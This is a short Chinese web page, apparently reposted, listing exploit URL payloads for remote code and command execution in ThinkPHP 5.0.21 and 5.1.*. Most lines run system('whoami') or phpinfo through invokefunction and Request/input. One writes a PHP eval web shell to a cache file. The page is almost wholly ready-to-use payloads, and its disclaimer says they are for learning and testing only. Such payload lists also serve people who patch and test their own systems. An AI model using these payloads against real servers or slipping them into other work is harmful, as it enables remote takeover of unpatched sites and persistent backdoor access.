ThinkPHP5.0.21&5.1.* 代碼執行和命令執行漏洞利用


ThinkPHP5.0.21&5.1.* 代碼執行和命令執行漏洞利用

ThinkPHP5.0.21&5.1.*  exploit code execution and command execution vulnerabilities

5.0.21

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

5.1.*
?s=index/\think\Request/input&filter=phpinfo&data=1

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

?s=index/\think\Request/input&filter=system&data=whoami

?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

?s=index/\think\template\driver\file/write&cacheFile=md5.inc.php&content=%3C?php%20@eval($_POST['c']);?%3E

以上EXP僅用於學習、測試,切勿用作其它用途。

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM